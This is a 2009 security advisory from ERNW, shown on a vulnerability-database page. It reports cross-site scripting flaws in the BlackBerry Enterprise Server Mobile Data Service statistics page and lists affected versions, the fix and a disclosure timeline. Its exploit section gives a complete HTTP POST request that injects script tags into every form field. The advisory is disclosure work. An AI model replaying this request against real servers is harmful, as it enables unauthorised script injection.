Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Blackberry Mobile Data Service XSS

🗓️ 17 Apr 2009 00:00:00Reported by Michael ThumannType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 28 Views

Blackberry Mobile Data Service XSS vulnerabilit

Code
`ERNW Security Advisory 01-2009  
  
XSS in Blackberries Mobile Data Service Connection Service  
  
Author: Michael Thumann <mthumann[at]ernw.de>  
  
1. Summary  
The Blackberry Mobile Data Service Connection is vulnerable to  
several XSS attacks in the "Customize Statistics Page".  
  
2. CVSS V2 Base Score : 3.5 (based on vendor rating)  
  
3. Products affected  
Blackberry Enterprise Server: all versions prior to 4.1.6 MR4  
  
4. Patch Availability : A patch is available from the vendor.  
  
5. Details   
Injecting scripts (containing standard and encoded XSS attacks) into  
all the fields of the "customize statitics page" reveals that none  
of the fields are properly validated for malicious input and the  
output isn't sanitized.  
  
6. Solution   
Update the affected products to the actual version.  
  
7. Time-Line   
16 Feb 2009: Discovery of the vulnerability   
02 Mar 2009: Vulnerability reported to vendor   
02 Mar 2009: Answer from vendor   
16 Apr 2009: Patch available   
16 Apr 2009: Public Disclosure  
  
8. Exploit   
POST /admin/statistics/ConfigureStatistics HTTP/1.0   
Cookie: JSESSIONID=....   
Content-Length: 753   
Accept: */*   
Accept-Language: en-US  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)   
Host: ...  
Content-Type: application/x-www-form-urlencoded   
Referer: http://x:8080/admin/statistics/ConfigureStatistics  
  
customDate=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&  
interval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&  
lastCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E  
&lastIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%  
3E&nextCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript  
%3E&nextIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%  
2Fscript%3E&action=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E  
&delIntervalIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&  
addStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&  
delStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&  
referenceTime=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E  
  
9. Thanks  
We would like to thank the guys from Blackberry for working  
together on this issue in a professional and responsible way.  
  
10. Disclaimer   
The informations in this advisory are provided "AS IS"  
without warranty of any kind. In no event shall the authors be liable  
for any damages whatsoever including direct, indirect, incidental,  
consequential, loss of business profits or special damages due to the  
misuse of any information provided in this advisory.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Apr 2009 00:00Current
0.2Low risk
Vulners AI Score0.2
xss attacksblackberry enterprise serverpatch availabilityscript injectionvendor responsesecurity advisory
28